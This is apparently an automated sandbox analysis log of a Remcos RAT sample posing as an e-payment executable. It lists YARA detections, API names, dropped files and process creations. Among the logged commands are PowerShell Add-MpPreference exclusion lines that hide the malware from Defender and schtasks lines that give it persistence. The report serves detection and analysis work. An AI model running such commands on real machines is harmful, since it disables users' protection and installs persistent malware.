            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JXHPwNYzysUjKo.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: e-Payment.NET.CMS4006975815.exe, SliderControl.cs | Base64 encoded string: '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'
            Source: JXHPwNYzysUjKo.exe.0.dr, SliderControl.cs | Base64 encoded string: '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'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.JXHPwNYzysUjKo.exe.2a37e08.4.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.28c7e80.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.4f90000.11.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.28a6cb0.3.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/16@0/1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Mutant created: \Sessions\1\BaseNamedObjects\bOZYTSsI
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Mutant created: \Sessions\1\BaseNamedObjects\remcos_rpklfmytvo
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD623.tmp
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: e-Payment.NET.CMS4006975815.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: e-Payment.NET.CMS4006975815.exe | ReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File read: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe
            Source: unknownProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Process created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Process created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: bcp47langs.dll
